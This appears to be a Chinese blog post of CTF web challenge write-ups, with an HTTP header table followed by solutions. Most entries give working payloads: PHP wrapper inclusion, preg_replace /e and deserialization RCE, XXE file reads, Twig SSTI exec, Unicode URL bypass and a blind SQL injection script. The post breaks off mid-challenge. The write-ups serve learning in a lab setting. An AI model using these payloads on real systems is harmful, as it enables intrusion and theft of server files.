web 刷题(二)

阅读数: 次 2020-11-08

文件响应头

Header	解释	示例
Accept	指定客户端能够接收的内容类型	Accept: text/plain, text/html,application/json
Accept-Charset	浏览器可以接受的字符编码集。	Accept-Charset: iso-8859-5
Accept-Encoding	指定浏览器可以支持的web服务器返回内容压缩编码类型。	Accept-Encoding: compress, gzip
Accept-Language	浏览器可接受的语言	Accept-Language: en,zh
Accept-Ranges	可以请求网页实体的一个或者多个子范围字段	Accept-Ranges: bytes
Authorization	HTTP授权的授权证书	Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==
Cache-Control	指定请求和响应遵循的缓存机制	Cache-Control: no-cache
Connection	表示是否需要持久连接。（HTTP 1.1默认进行持久连接）	Connection: close
Cookie	HTTP请求发送时，会把保存在该请求域名下的所有cookie值一起发送给web服务器。	Cookie: $Version=1; Skin=new;
Content-Length	请求的内容长度	Content-Length: 348
Content-Type	请求的与实体对应的MIME信息	Content-Type: application/x-www-form-urlencoded
Date	请求发送的日期和时间	Date: Tue, 15 Nov 2010 08:12:31 GMT
Expect	请求的特定的服务器行为	Expect: 100-continue
From	发出请求的用户的Email	From: user@email.com
Host	指定请求的服务器的域名和端口号	Host: www.zcmhi.com
If-Match	只有请求内容与实体相匹配才有效	If-Match: “737060cd8c284d8af7ad3082f209582d”
If-Modified-Since	如果请求的部分在指定时间之后被修改则请求成功，未被修改则返回304代码	If-Modified-Since: Sat, 29 Oct 2010 19:43:31 GMT
If-None-Match	如果内容未改变返回304代码，参数为服务器先前发送的Etag，与服务器回应的Etag比较判断是否改变	If-None-Match: “737060cd8c284d8af7ad3082f209582d”
If-Range	如果实体未改变，服务器发送客户端丢失的部分，否则发送整个实体。参数也为Etag	If-Range: “737060cd8c284d8af7ad3082f209582d”
If-Unmodified-Since	只在实体在指定时间之后未被修改才请求成功	If-Unmodified-Since: Sat, 29 Oct 2010 19:43:31 GMT
Max-Forwards	限制信息通过代理和网关传送的时间	Max-Forwards: 10
Pragma	用来包含实现特定的指令	Pragma: no-cache
Proxy-Authorization	连接到代理的授权证书	Proxy-Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==
Range	只请求实体的一部分，指定范围	Range: bytes=500-999
Referer	先前网页的地址，当前请求网页紧随其后,即来路	Referer: http://www.zcmhi.com/archives…
TE	客户端愿意接受的传输编码，并通知服务器接受接受尾加头信息	TE: trailers,deflate;q=0.5
Upgrade	向服务器指定某种传输协议以便服务器进行转换（如果支持）	Upgrade: HTTP/2.0, SHTTP/1.3, IRC/6.9, RTA/x11
User-Agent	User-Agent的内容包含发出请求的用户信息	User-Agent: Mozilla/5.0 (Linux; X11)
Via	通知中间网关或代理服务器地址，通信协议	Via: 1.0 fred, 1.1 nowhere.com (Apache/1.1)
Warning	关于消息实体的警告信息	Warn: 199 Miscellaneous warning

[BJDCTF2020]ZJCTF，不过如此

2020.11.8

考点

伪协议

[ZJCTF 2019]NiZhuanSiWei 这个题目类似

做题步骤

有源码

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

绕过 if 语句 ?text=data://text/plain,I%20have%20a%2dream
然后可以利用伪协议得到 next.php 的源代码 file=php://filter/convert.base64-encode/resource=next.php

解密

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

可以利用 getFlag 方法来得到 flag

/e模式的preg_replace,有一个远程代码执行漏洞。

https://xz.aliyun.com/t/2557

利用上面文章的爬坑2 实现代码执行

/next.php?\S*=${getFlag()}&cmd=system(%27cat%20/flag%27);
得到 flag

[GKCTF2020]CheckIN

2020.11.8

考点

命令执行

php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令

https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php

参考

https://troyess.com/2020/07/17/GKCTF2020-CheckIN/

做题步骤

网页代码

<title>Check_In</title>
<?php 
highlight_file(__FILE__);
class ClassName
{
        public $code = null;
        public $decode = null;
        function __construct()
        {
                $this->code = @$this->x()['Ginkgo'];
                $this->decode = @base64_decode( $this->code );
                @Eval($this->decode);
        }

        public function x()
        {
                return $_REQUEST;
        }
}
new ClassName();

发现可以代码执行

PHP Version 7.3.18

https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php

对应的漏洞

我们现在可以实现利用 get 让 $Eval() => 一个shell 然后蚁剑链接

成功链接

上传 https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php 的exp 在 /tmp 目录下然后用文件包含调用得到 flag

exp

?Ginkgo=aW5jbHVkZSgiL3RtcC9leHAucGhwIik7Cg==

[BJDCTF 2nd]假猪套天下第一

2020.11.9

考点

文件备份 .DS_Store

做题步骤

打开网站发现除了 admin 都能登录
扫下目录发现有个 .DS_Store 备份文件下载

利用 https://github.com/gehaxelt/Python-dsstore 对 Ds_Store 进行分析

看到对应的 php 文件
尝试访问 L0g1n.php (需要先随便登录一个账号) 然后才能访问这个网页

抓包看看

发现有个 time 尝试把他改的很大

然后提示

Xff 和 client-ip 测试发现只有 client-ip 可以
然后添加 Referer

添加 User-Agent:

发现不对发现原名应该是 Commodore 64

添加 From
添加 via

base64 解密得到 flag

[SUCTF 2019]Pythonginx

2020.11.9

考点

python CVE-2019-9636：urlsplit不处理NFKC标准化

https://bugs.python.org/issue36216

Nginx 重要文件

配置文件存放目录：/etc/nginx
主配置文件：/etc/nginx/conf/nginx.conf 或 /etc/nginx/nginx.conf
管理脚本：/usr/lib64/systemd/system/nginx.service
模块：/usr/lisb64/nginx/modules
应用程序：/usr/sbin/nginx
程序默认存放位置：/usr/share/nginx/html
日志默认存放位置：/var/log/nginx

https://www.cnblogs.com/wangtanzhi/p/12181032.html

做题步骤

这里有三个 if

1.  
	url = request.args.get("url") 
  host = parse.urlparse(url).hostname 
  if host == 'suctf.cc': 

2. 
	parts = list(urlsplit(url)) 
  host = parts[1] 
  if host == 'suctf.cc': 
3. 
  newhost = [] 
  for h in host.split('.'): 
      newhost.append(h.encode('idna').decode('utf-8')) 
  parts[1] = '.'.join(newhost) 
  #去掉 url 中的空格 
  finalUrl = urlunsplit(parts).split(' ')[0] 
  host = parse.urlparse(finalUrl).hostname 
  if host == 'suctf.cc':

要求第一第二处理都不能等于 suctf.cc 第三个处理后等于 suctf.cc

parse.urlparse(url).hostname

list(urlsplit(url))[1]

urlunsplit(parts).split(' ')[0]

第三个

经过了 urlunsplit 后变成 suctf.cc

我们可以了利用 unicode 字符来进行变化绕过

可以利用下面脚本修改 suctf.cc 中的任意一个字符串从而实现绕过

from urllib.parse import urlparse,urlunsplit,urlsplit
from urllib import parse
def get_unicode():
    for x in range(65536):
        uni=chr(x)
        url="http://suctf.c{}".format(uni)
        try:
            if getUrl(url):
                print("str: "+uni+' unicode: \\u'+str(hex(x))[2:])
        except:
            pass


def getUrl(url):
    url = url
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return False
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return False
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return True
    else:
        return False

if __name__=="__main__":
    get_unicode()
   
'''
str: ℂ unicode: \u2102
str: ℭ unicode: \u212d
str: Ⅽ unicode: \u216d
str: ⅽ unicode: \u217d
str: Ⓒ unicode: \u24b8
str: ⓒ unicode: \u24d2
str: Ｃ unicode: \uff23
str: ｃ unicode: \uff43
'''

在unicode中字符℀(U+2100)，当IDNA处理此字符时，会将℀变成a/c，因此当你访问此url时，dns服务器会自动将url重定向到另一个网站。如果服务器引用前端url时，只对域名做了限制，那么通过这种方法，我们就可以轻松绕过服务器对域名的限制了。

我们利用的就是

for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
finalUrl = urlunsplit(parts).split(' ')[0]

我们可以用 unicode 字符来代替原本的 suctf.cc

读配置文件

/getUrl?url=file://suctf.cℂ/../../../usr/local/nginx/conf/nginx.conf

读flag

/getUrl?url=file://suctf.cℂ/../../../usr/fffffflag

[网鼎杯 2020 朱雀组]phpweb

2020.11.9

考点

反序列化

反斜杠绕过

file_get_contents

做题步骤

链接题目发现没过一段时间网页会刷新时间

查看源代码

有个 form 表单提交。

我们猜测 func 就是要传入的方法发现默认是 data

我们尝试用 system

发现不能执行

我们尝试利用 \ 看看能不能绕过 \system

发现成功实现了。

但是里面没有flag 我们利用命令去找一下

func=\system&p=find / -name flag* 找到然后利用 cat 来打印

得到 flag

func=\system&p=cat /tmp/flagoefiu4r93

学习 wp

https://blog.csdn.net/SopRomeo/article/details/106364298

可以利用 file_get_contents 来查看 index.php

index.php

<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a= gettype($result);
    if ($a == "string") {
        return $result;
    } else {return "";}
}
class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];

if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func,$disable_fun)) {
        echo gettime($func, $p);
    }else {
        die("Hacker...");
    }
}
?>

里面过滤了很多函数且里面存在一个 class Test 且有一个 __destruct() 的魔术方法且这个方法里面还存在一个函数调用 gettime 调用 call_user_func 所以如果我们传入的是 Test 类的序列化传入的方法为 unserialize 这样反序列化后在 Test 类结束后会调用对应的 __destruct() 的魔术方法里面的 gettime实现函数调用。

payload 布置

<?php
 class Test {
        var $p = "ls /";
        var $func = "system";
}
$a = new Test();
echo serialize($a);
// O:4:"Test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}
//unserialize
?>

传入也能执行

所以我们可以利用这个来实现一样的代码执行

exp

<?php
 class Test {
        var $p = "find / -name flag*";
        var $func = "system";
}
$a = new Test();
echo serialize($a);
// O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}
//unserialize
?>

exp2

<?php
 class Test {
        var $p = "cat /tmp/flagoefiu4r93";
        var $func = "system";
}
$a = new Test();
echo serialize($a);
// O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}
//unserialize
?>

得到 flag

[0CTF 2016]piapiapia

2020.11.10

考点

www.zip 源码泄露

反序列化逃逸

做题步骤

利用得到的 www.zip 的源码泄露

代码审计

发现代码中 profile.php 中有反序列化

然后更具反序列化后的值进行输出

这个简直通过 $user->show_profile($username); 获得

public function show_profile($username) {
		$username = parent::filter($username);

		$where = "username = '$username'";
		$object = parent::select($this->table, $where);
		return $object->profile;
	}

在我们的数据

然后在 update.php 中发现他会将我们的信息序列化后保存

if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {

		$username = $_SESSION['username'];
		if(!preg_match('/^\d{11}$/', $_POST['phone']))
			die('Invalid phone');

		if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
			die('Invalid email');
		
		if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
			die('Invalid nickname');

		$file = $_FILES['photo'];
		if($file['size'] < 5 or $file['size'] > 1000000)
			die('Photo size error');

		move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
		$profile['phone'] = $_POST['phone'];
		$profile['email'] = $_POST['email'];
		$profile['nickname'] = $_POST['nickname'];
		$profile['photo'] = 'upload/' . md5($file['name']);

		$user->update_profile($username, serialize($profile));
		echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
	}

但是发现我们的所有操作。都会经过 class.php 里面的 filter 函数过滤

public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}

在这个过滤中。我们发现如果存在 select insert update delete where 字符串都会被替换成 haker，但是发现这里我们的 where 是5个字符串然后替换成 hacker 会变成 6个字符串。这样会印象我们的反序列化链。

且 $user->update_profile($username, serialize($profile));

上传的 $profile 是序列化后的值，如果我们上传的 $profile 里面存在 where 等参数就会影响到原理的值。

如果我们讲序列化的值的 photo 的保存内容修改为 config.php 这样在 profile.php 中就能得到服务器上 config.php 的内容从而得到 flag

所以我们需要修改反序列化中

";}s:5:"photo";s:39:"upload/b068931cc450442b63f5b3d276ea4297";} 为 ";}s:5:"photo";s:10:"config.php";}

修改的字符长度为 34

当我们的name = where时我们的字符串经过 filter 过滤后变成hacker 让我们的字符串变长了。

这样，我们输入 34 个 where 。filter 转义后成了 34个 hacker 这样我们name 末尾的 ";}s:5:"photo";s:10:"config.php";} 就成功被往后移动，移动到了原本的 photo 序列化后的位置

这样我们的 ";}s:5:"photo";s:10:"config.php";} 就成了我们现在的 photo 对应的序列化。反序列后我们的 photo = config.php 从而我们在 profile.php 中我们的 photo 显示的内容就是 config.php的内容。

变化如下

a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:8:"ss@q.com";s:8:"nickname";a:1:{i:0;s:204:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere"};s:5:"photo";s:10:"config.php";}s:39:"upload/804f743824c0451b2f60d81b63b6a900";}

过滤后
  
a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:8:"ss@q.com";s:8:"nickname";a:1:{i:0;s:204:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";}s:5:"photo";s:10:"config.php";}s:39:"upload/804f743824c0451b2f60d81b63b6a900";}

要绕过一个点

在update.php 中
1
2
if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
die('Invalid nickname');
我们传入的 name <=10 所以这里。我们可以利用数组绕过 nickname=aaaa[] 这样就能实现绕过

测试创建账号登录
update.php

wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

然后访问 profile.php

对其进行 base64 解密

得到 flag

[ASIS 2019]Unicorn shop

2020.11.10

考点

python

Unicode

做题步骤

打开网页

当我们在 price 输入很小时发现会报错 Wrong commodity!

当我们输入很大的 price 时 Only one char(?) allowed!

不输入 price 报错

知道是 unicode 的

我们尝试使用 unincode 大于 1337的

https://www.compart.com/en/unicode/search?q=thousand#characters

大于等于 U+2181 的数

从而得到 flag

[NCTF2019]Fake XML cookbook

2020.11.11

考点

XXE

https://www.cnblogs.com/sijidou/p/10497663.html

https://xz.aliyun.com/t/6887#toc-5

做题步骤

登录网址

当我们输入 username = 1 密码为 1时有个tips 提示

js 代码

function doLogin(){
	var username = $("#username").val();
	var password = $("#password").val();
	if(username == "" || password == ""){
		alert("Please enter the username and password!");
		return;
	}
	
	var data = "<user><username>" + username + "</username><password>" + password + "</password></user>"; 
    $.ajax({
        type: "POST",
        url: "doLogin.php",
        contentType: "application/xml;charset=utf-8",
        data: data,
        dataType: "xml",
        anysc: false,
        success: function (result) {
        	var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
        	var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
        	if(code == "0"){
        		$(".msg").text(msg + " login fail!");
        	}else if(code == "1"){
        		$(".msg").text(msg + " login success!");
        	}else{
        		$(".msg").text("error:" + msg);
        	}
        },
        error: function (XMLHttpRequest,textStatus,errorThrown) {
            $(".msg").text(errorThrown + ':' + textStatus);
        }
    }); 
}

抓包

传送了一个 xml 的语句我们修改包
1
2
3
<!DOCTYPE ANY [ <!ENTITY a SYSTEM "file:///flag">
]>
<user><username>&a;</username><password>123</password></user>
包含服务器本地的 file:///flag 当我们登录错误

在 tips 里面会显示我们的用户名

也就是我们的 /flag

x

[CISCN 2019 初赛]Love Math

2020.11.11

考点

RCE php 代码认识

做题步骤

开始网页给出源码

<?php
error_reporting(0);
//听说你很喜欢数学，不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}

题目最后有个 eval

所以应该要实现 RCE 利用给的数学函数，和数字组成一个输出

base_convert()：在任意进制之间转换数字（2 - 32 进制)。
dechex()：把十进制数转换为十六进制数。

我们要利用上面的函数实现将我们的数字转化为 {$_GET}{xx} 的类型从而实现调用

1	$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=ls /

这个 payload 在运行中的过程如下

echo base_convert(37907361743,10,36);  ==>  hex2bin
echo dechex(1598506324);   ==>  5f474554  
hex2bin(5f474554)  ==>  _GET
($$pi){pi}(($$pi){abs})   ==>   ($_GET){pi}(($_GET){abs})
然后我们get 传参 传入 pi 和 abs 的值就好
pi = system
abs = 要执行的指令
这样我们就能实现调用

其他调用

1	$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})

base_convert(696468,10,36) => "exec"
$pi(8768397090111664438,10,30) => "getallheaders"
exec(getallheaders(){1})
//操作xx和yy，中间用逗号隔开，echo都能输出
echo xx,yy

2020.11.11

考点

Ssti 注入

https://www.k0rz3n.com/2018/11/12/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8BSSTI%E6%BC%8F%E6%B4%9E/#2-Twig

在这里插入图片描述

做题步骤

打开网站

点击功能找到一格 flag.php 进去后发现输入框有一个 ssti 注入

Submit 后

发现我们输入的 4 被运行了说明这里存在注入。

根据

在这里插入图片描述

我们测试时什么模板

输入 {{7*'7'}} 返回 49 所以是 Twig 如果是 Jinja2 会返回 ‘7777777’

网上找

所有我们利用文章的 pyload 测试

bp 抓包直接修改对应的上传数据发现不能执行

然后抓取登录后的数据包

这里我们修改 user 的值

1	{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

发现执行了

我们去找到 flag 的位置

1	{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("find / -name flag")}}

然后打开flag

1	{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

[WesternCTF2018]shrine

2020.11.11

考点

flask 全局变量

https://flask.palletsprojects.com/en/1.0.x/api/#flask.get_flashed_messages

https://flask.palletsprojects.com/en/1.0.x/api/#flask.url_forbaobaoer.cn/archives/656/python-b2e7b180e9b880e793

做题步骤

打开网站


import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

我们发现在源代码中。存在两个路由。

根目录是显示源代码的

在 /shrine 目录下有函数执行

且设置了黑名单 ['config', 'self']

且刚开始注册了一个 app.config['FLAG'] = os.environ.pop('FLAG') config 全局变量

测试发现会调用 4

根据储存我们可以猜测 flag 就在全局的 FLAG 但是 config 被禁用了

我们使用 url_for 和 get_flashed_messages

{{url_for.__globals__}} 查看 app 的名字
然后去查看 app 里面的全局变量 {{url_for.__globals__['current_app'].config}}

从而得到 flag

比如 {{get_flashed_messages.__globals__['current_app'].config}}

[BJDCTF 2nd]简单注入

2020.11.12

考点

sql 盲注

做题步骤

找到 /hint.txt 里面有sql 语句我们的 sql 语句中 username 被单引号隔开了

Only u input the correct password then u can get the flag
and p3rh4ps wants a girl friend.

select * from users where username='$_POST["username"]' and password='$_POST["password"]';

我们可以利用反斜杠进行单引号逃逸

根据提示我们知道我们需要得到正确的 password 且我们的传入中 = 被过滤了

我们只能用 substr 来对password 进行分割从而盲注得到 flag

利用二分法

import requests
url = "http://3b346678-d97b-421e-b702-9a3c213aed10.node3.buuoj.cn/index.php"

data = {"username":"admin\\","password":""}
result = ""
i = 0

while( True ):
	i = i + 1 
	head=32
	tail=127

	while( head < tail ):
		mid = (head + tail) >> 1

		payload = "or/**/if(ascii(substr(password,%d,1))>%d,1,0)#"%(i,mid)
		
		data['password'] = payload
		r = requests.post(url,data=data)

		if "stronger" in r.text :
			head = mid + 1
		else:
			tail = mid
	last = result
	
	if head!=32:
		result += chr(head)
	else:
		break
	print(result)

[安洵杯 2019]easy_serialize_php

2020.11.13

考点

反序列化

首先会得到一部分源码

<?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

先查看 phpinfo()

发现有一个 d0d3_f1ag.php

想办法访问
在代码中检测到 $filter_arr = array('php','flag','php5','php4','fl1g') 会被替换为空

可以利用双写绕过
代码逻辑如果我们 SESSION 存在 img 键值就会被 base64 加密等从而影响我们最后的 file_get_contents 的输出

所以我们要考虑如果绕过。
发现我们的 filter 实在判断了 $_SESSION['img'] 之后才调用的且他是替换我们的输入为空

那我们可以在文明点 SESSION 后面加上img 的键值从而在 filter 过滤后让我们的 img 键值到我们的 SESSION 熟悉里面

extract()变量覆盖

https://crayon-xin.github.io/2018/05/21/extract%E5%8F%98%E9%87%8F%E8%A6%86%E7%9B%96/

我们可以利用变量覆盖来修改 SESSION的内容

我们就可以布置 SESSION 的 usr 内容为 filter 要过滤的字符串 function 内容布置为新的 img 的地址

这样我们在直接 filter 之后 usr 内容会被过替换为空进而吃掉 function 键值名，让 function 内容为我们的新的 img 的地址。

payload

<?php
$_SESSION['user']="flagflagflagphpflagflag";
$_SESSION['function'] = '";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
$_SESSION['img'] = base64_encode('guest_img.png');
$a = serialize($_SESSION);
var_dump($a);
function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}
var_dump(filter($a));

运行结果

我们会发现。因为 filter 的过滤我们的 SESSION 的 user 键值的内容被替换为空

我们的 function 键值名刚好被替换，我们的 function 的内容变成了新的键值 img

因为我们传递的 function的内容是闭合了的所以这样传入我们就能是实现工具

从而最后的 file_get_contents 打开的就是我们布置的 img 的内容

所以我们 post 传入值覆盖 SESSION 的内容

访问地址为 /index.php?f=show_image

1	_SESSION[user]=flagflagflagphpflagflag&_SESSION[function] =";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"a";s:1:"a";}

得到里面的内容

然后我们去查看这个对应文件的 flag

echo -n "/d0g3_fllllllag" | base64
# L2QwZzNfZmxsbGxsbGFn
>>> len("L2QwZzNfZmxsbGxsbGFn")
# 20

payload2

1	_SESSION[user]=flagflagflagphpflagflag&_SESSION[function] =";s:3:"img";s:24:"L2QwZzNfZmxsbGxsbGFnCg==";s:1:"a";s:1:"a";}

得到 flag

[BSidesCF 2020]Had a bad day

2020.11.13

考点

伪协议

伪协议包含一个协议

做题步骤

根据题目功能发现应该有一个 Include 文件包含。

利用 php 伪协议读源代码

/index.php?category=php://filter/read=convert.base64-encode/resource=index

index.php

<html>
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="description" content="Images that spark joy">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0">
    <title>Had a bad day?</title>
    <link rel="stylesheet" href="css/material.min.css">
    <link rel="stylesheet" href="css/style.css">
  </head>
  <body>
    <div class="page-layout mdl-layout mdl-layout--fixed-header mdl-js-layout mdl-color--grey-100">
      <header class="page-header mdl-layout__header mdl-layout__header--scroll mdl-color--grey-100 mdl-color-text--grey-800">
        <div class="mdl-layout__header-row">
          <span class="mdl-layout-title">Had a bad day?</span>
          <div class="mdl-layout-spacer"></div>
        <div>
      </header>
      <div class="page-ribbon"></div>
      <main class="page-main mdl-layout__content">
        <div class="page-container mdl-grid">
          <div class="mdl-cell mdl-cell--2-col mdl-cell--hide-tablet mdl-cell--hide-phone"></div>
          <div class="page-content mdl-color--white mdl-shadow--4dp content mdl-color-text--grey-800 mdl-cell mdl-cell--8-col">
            <div class="page-crumbs mdl-color-text--grey-500">
            </div>
            <h3>Cheer up!</h3>
              <p>
                Did you have a bad day? Did things not go your way today? Are you feeling down? Pick an option and let the adorable images cheer you up!
              </p>
              <div class="page-include">
              <?php
				$file = $_GET['category'];

				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
				?>
			</div>
          <form action="index.php" method="get" id="choice">
              <center><button onclick="document.getElementById('choice').submit();" name="category" value="woofers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Woofers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button>
              <button onclick="document.getElementById('choice').submit();" name="category" value="meowers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Meowers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button></center>
          </form>

          </div>
        </div>
      </main>
    </div>
    <script src="js/material.min.js"></script>
  </body>
</html>%

其中 strrpos() - 查找字符串在另一字符串中最后一次出现的位置（区分大小写）

所以只要我们的输入中必须存在

woofers meowers index

我们也是利用伪协议读

但是要至少存在上述的3个字符串 php://filter伪协议可以套一层协议

php://filter/read=convert.base64-encode/index/resource=flag

这样我们的 payload 不带存在了 index 字符串而且实现的功能是读取 flag.php

得到 base64

解密

[WUSTCTF2020]朴实无华

2020.11.13

考点

md5 加密等于本身

str_ireplace 绕过

做题步骤

更具提议我猜测有个 robots.txt

访问
去访问 /fAke_f1agggg.php 文件

抓包发现 /fl4g.php 访问
得到了源码

<img src="/img.jpg">
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
